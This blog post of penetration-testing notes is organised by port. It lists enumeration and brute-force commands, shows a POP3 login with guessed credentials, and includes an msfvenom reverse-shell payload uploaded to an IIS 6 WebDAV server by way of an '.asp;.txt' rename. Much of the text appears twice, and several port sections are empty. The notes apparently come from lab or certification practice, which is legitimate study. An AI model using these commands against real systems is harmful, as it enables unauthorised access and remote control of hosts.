Below is the Process. This is the process to follow based on the situation that presents itself during a Pentest.
Before assuming that the port is only listening on 1 service, use amap to check if multple services are running on the same port.
amap 192.168.254.15 12380
Protocol on 192.168.254.15:12380/tcp matches http
Protocol on 192.168.254.15:12380/tcp matches http-apache2
Protocol on 192.168.254.15:12380/tcp matches ntp
Protocol on 192.168.254.15:12380/tcp matches ssl
As we can see on port 12380 HTTP, NTP & SSL are running! we would of known this otherwise!
=================================================
TCP Port 21
nmap -sV -sC 10.11.1.8 -p 21
Banner grab - (nmap -v -p 21 -sV x.x.x.x --script=banner)
Try logging in Anonymously
lftp anonymous@IP
No Password (hit Enter)
=================================================
TCP Port 22
How to use a differ key exchange?
-oKexAlgorithms=
e.g.
-oKexAlgorithms=diffie-hellman-group-exchange-sha1
=================================================
TCP Port 23
=================================================
=================================================
TCP Port 25
smtp-user-enum -M VRFY -U /usr/share/wordlists/Seclists/Usernames/Names/names.txt -t 10.11.1.229
=================================================
TCP Port 53 - DNS Related testing... (WHEN OPEN THIS IS USUALLY TO FACILITATE ZONE TRANSFERS)
TCP port 53 is unusual because we normally see this on UDP 53.
nslookup
> SERVER 'IP' - this command allows us to connect initially to the Name Server.
> 127.0.0.1 - lets see what we get from local host
>'IP' try the IP of the box your are testing
>'test.com' any host name that seems logical to the box that might help.
dnsrecon -r 127.0.0.0/24 -n 'IP' IP can be 192.168.1.1 or whatever you are testing
also try..
dnsrecon -r 127.0.1.0/24 -n 'IP'
next try..
dnsrecon -r '192.168.1.0/24' -n 192.168.1.1 - This time we look at the entire /24. you can also try /16 and /8 as needed.
next try with dig and add the dns server address..
dig axfr @192.168.1.2 (where 192.168.1.2 is the DNS Server address)
next try
dig axfr test.com @192.168.1.2
OR
dig axfr @192.168.1.2 test.com
================================================== TCP PORT 79 - FINGER (What user have/are logged in to the system)
1) Download finger-user-enum.pl
wget https://raw.githubusercontent.com/pentestmonkey/finger-user-enum/master/finger-user-enum.pl
1.1)perl finger-user-enum.pl -U /usr/share/wordlists/SecLists/Usernames/Names/names.txt -t 10.10.10.76 | less -S
Getting the results can takes AGES! be PATIENT!
Also whilst waiting, you can run multiples so create a user.txt file and add in names that could be relevant based on other enumeration.
1.2) Once we have results we are looking for "pts/2" or "pts/3" (the terminal slthey logged into) also the Time and the address. This tells us that these names exist and are either currently logged in or have logged in recently.
================================================== TCP Port 80 (or any HTTP listening service)
nmap -sC -sV -A -p 80 ip
Nikto
dirbuster first as this seem to give better performance
TCP Port 110 - POP3 - Read Email with LIST Command
#Try to brute force the pop3 names
nmap -sV --script=pop3-brute 10.10.10.51
Example
110/tcp open pop3 JAMES pop3d 2.3.2
| pop3-brute:
| Accounts: No valid accounts found
| Statistics: Performed 19457 guesses in 404 seconds, average tps: 47.2
|_ ERROR: Failed to connect.
root@kali:~# telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER john
+OK
PASS john
+OK Welcome john
list
+OK 1 743
1 743
.
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <john@localhost>;
Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John,
Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.
Thank you in advance.
Respectfully,
James
.
=================================================
TCP Port 111 - RPCBind
apt install nfs-common
TCP Port 135 - Remote Procedure Call
nbtstat -a
TCP Port 137
TCP Port 139
TCP Port 161
TCP Port 162
TCP Port 443
TCP Port 445
TCP Ports 512,513,514
apt-get install rsh-client
#Try to login with the root user or a user found already.
rlogin -l root 192.168.1.98
#If not try to brute - output is slow but will come.
nmap -p 513 --script rlogin-brute 192.168.1.98 -v
TCP Port 3306
TCP Port 3389
Mail
IIS6.0 Server 2003 ASP File Upload
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.108 LPORT=4444 -f asp --arch x86 --platform windows > shell_reverse_tcp.asp
dav:/> put shell_reverse_tcp.txt │
Uploading shell_reverse_tcp.txt to `/shell_reverse_tcp.txt': │
Progress: [=============================>] 100.0% of 38349 bytes succeeded. │
dav:/> copy shell_reverse_tcp.txt shell_reverse_tcp.asp;.txt │
Copying `/shell_reverse_tcp.txt' to `/shell_reverse_tcp.asp%3b.txt': succeeded. │
dav:/>
Image Files
exiftool -a -u -g1 FILENAME
binwalk -ME FILENAME
Using Put to create a shell with IIS 6 - Create payload then upload it and switch names to .txt form there copy it to .asp;.txt
Opening Database Files
-SDF files can be opened with SQL Query Compact Analyser;
-MDF files can be opened with SQL MDF Viewer
LFI
found an LFI? or want to test for LFI use lfisuite
Before assuming that the port is only listening on 1 service, use amap to check if multple services are running on the same port.
amap 192.168.254.15 12380
Protocol on 192.168.254.15:12380/tcp matches http
Protocol on 192.168.254.15:12380/tcp matches http-apache2
Protocol on 192.168.254.15:12380/tcp matches ntp
Protocol on 192.168.254.15:12380/tcp matches ssl
As we can see on port 12380 HTTP, NTP & SSL are running! we would of known this otherwise!
=================================================
TCP Port 21
nmap -sV -sC 10.11.1.8 -p 21
Banner grab - (nmap -v -p 21 -sV x.x.x.x --script=banner)
Try logging in Anonymously
lftp anonymous@IP
No Password (hit Enter)
TCP Port 22
How to use a differ key exchange?
-oKexAlgorithms=
e.g.
-oKexAlgorithms=diffie-hellman-group-exchange-sha1
=================================================
TCP Port 23
=================================================
=================================================
TCP Port 25
POP3 Enumeration
Check for usernmae enumeration
smtp-user-enum -M VRFY -U /usr/share/wordlists/Seclists/Usernames/Names/names.txt -t 10.11.1.229
Test if VRFY is allowed..
telnet 10.11.1.229 25
Trying 10.11.1.229...
Connected to 10.11.1.229.
Escape character is '^]'.
220 MAIL ESMTP
HELO
501 HELO Invalid domain address.
HELO x
250 Hello.
VRFY root
502 VRFY disallowed.
VRFY blah
502 VRFY disallowed.
HELP
211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
telnet 10.11.1.229 25
Trying 10.11.1.229...
Connected to 10.11.1.229.
Escape character is '^]'.
220 MAIL ESMTP
HELO
501 HELO Invalid domain address.
HELO x
250 Hello.
VRFY root
502 VRFY disallowed.
VRFY blah
502 VRFY disallowed.
HELP
211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
TCP port 53 is unusual because we normally see this on UDP 53.
nslookup
> SERVER 'IP' - this command allows us to connect initially to the Name Server.
> 127.0.0.1 - lets see what we get from local host
>'IP' try the IP of the box your are testing
>'test.com' any host name that seems logical to the box that might help.
dnsrecon -r 127.0.0.0/24 -n 'IP' IP can be 192.168.1.1 or whatever you are testing
also try..
dnsrecon -r 127.0.1.0/24 -n 'IP'
next try..
dnsrecon -r '192.168.1.0/24' -n 192.168.1.1 - This time we look at the entire /24. you can also try /16 and /8 as needed.
next try with dig and add the dns server address..
dig axfr @192.168.1.2 (where 192.168.1.2 is the DNS Server address)
next try
dig axfr test.com @192.168.1.2
OR
dig axfr @192.168.1.2 test.com
================================================== TCP PORT 79 - FINGER (What user have/are logged in to the system)
1) Download finger-user-enum.pl
wget https://raw.githubusercontent.com/pentestmonkey/finger-user-enum/master/finger-user-enum.pl
1.1)perl finger-user-enum.pl -U /usr/share/wordlists/SecLists/Usernames/Names/names.txt -t 10.10.10.76 | less -S
Getting the results can takes AGES! be PATIENT!
Also whilst waiting, you can run multiples so create a user.txt file and add in names that could be relevant based on other enumeration.
1.2) Once we have results we are looking for "pts/2" or "pts/3" (the terminal slthey logged into) also the Time and the address. This tells us that these names exist and are either currently logged in or have logged in recently.
================================================== TCP Port 80 (or any HTTP listening service)
nmap -sC -sV -A -p 80 ip
Nikto
dirbuster first as this seem to give better performance
dirsearch - test with "-f" this can change the outcome of directories from 302's to 200's - Not sure Why but try it!
If all responses are returning '200 OK' then start to wfuzz. Go to Wfuzz page
https://sql--injection.blogspot.com/p/wfuzz.html
if there is a /cgi-bin/ folder then search for .sh .py files!
Add a logical name into the 'hosts' file and re check the site.
Check for Webdav - nmap -T4 -p80 --script=http-iis-webdav-vuln 10.11.1.229
If sits run davtest - davtest -url http://10.11.1.229
then CADAVAR - cadvar
if the site has extensions like (.php) then add the extension option in diresearch "-e" or dirb "-X"
Test For HTTP PUT Method - curl -X OPTIONS http://IP:PORT -v
If PUT available..
Upload a file - curl -i -X PUT -H "Content-Type: application/xml; charset=utf-8" -d @"/directory/to/file" http://IP:Port
Read the source code? --> Any comments? --> Any hint to a WordPress or Joomla Site?
If Joomla - run JScan
If WordPress - WPSCAN --> Goto Wordpress Section
If the webpage doesnt finish with an extension (e.g.) http://test/index - then try phpfilters.
php://filter/convert.base64-encode/resource=index
Got a login portal? Goto WEB LOGIN=================================================
TCP Port 110 - POP3 - Read Email with LIST Command
#Try to brute force the pop3 names
nmap -sV --script=pop3-brute 10.10.10.51
Example
110/tcp open pop3 JAMES pop3d 2.3.2
| pop3-brute:
| Accounts: No valid accounts found
| Statistics: Performed 19457 guesses in 404 seconds, average tps: 47.2
|_ ERROR: Failed to connect.
root@kali:~# telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER john
+OK
PASS john
+OK Welcome john
list
+OK 1 743
1 743
.
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <john@localhost>;
Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John,
Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.
Thank you in advance.
Respectfully,
James
.
=================================================
TCP Port 111 - RPCBind
apt install nfs-common
- rpcinfo -p 192.168.1.112 | grep nfs
- showmount -e 192.168.1.11
- If we get an output like..
- Export list for 192.168.1.98:
/home/vulnix * - The * indicates that any IP is allowed to connect.
- mount -t nfs /home/vulnix/ /mnt/whatever -nolock
- If we get a "Permission Denied" then this could be "root squashing" which means we cant access it basically.
TCP Port 135 - Remote Procedure Call
nbtstat -a
TCP Port 137
TCP Port 139
TCP Port 161
TCP Port 162
TCP Port 443
TCP Port 445
apt-get install smb4k -yTCP Ports 512,513,514
apt-get install rsh-client
#Try to login with the root user or a user found already.
rlogin -l root 192.168.1.98
#If not try to brute - output is slow but will come.
nmap -p 513 --script rlogin-brute 192.168.1.98 -v
TCP Port 3306
TCP Port 3389
POP3 Enumeration - Enumerate USERNAMES
smtp-user-enum -M VRFY -U /usr/share/wordlists/Seclists/Usernames/Names/names.txt -t 10.11.1.229
IIS6.0 Server 2003 ASP File Upload
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.108 LPORT=4444 -f asp --arch x86 --platform windows > shell_reverse_tcp.asp
dav:/> put shell_reverse_tcp.txt │
Uploading shell_reverse_tcp.txt to `/shell_reverse_tcp.txt': │
Progress: [=============================>] 100.0% of 38349 bytes succeeded. │
dav:/> copy shell_reverse_tcp.txt shell_reverse_tcp.asp;.txt │
Copying `/shell_reverse_tcp.txt' to `/shell_reverse_tcp.asp%3b.txt': succeeded. │
dav:/>
Image Files
exiftool -a -u -g1 FILENAME
binwalk -ME FILENAME
Using Put to create a shell with IIS 6 - Create payload then upload it and switch names to .txt form there copy it to .asp;.txt
Opening Database Files
-SDF files can be opened with SQL Query Compact Analyser;
-MDF files can be opened with SQL MDF Viewer
LFI
found an LFI? or want to test for LFI use lfisuite
No comments:
Post a Comment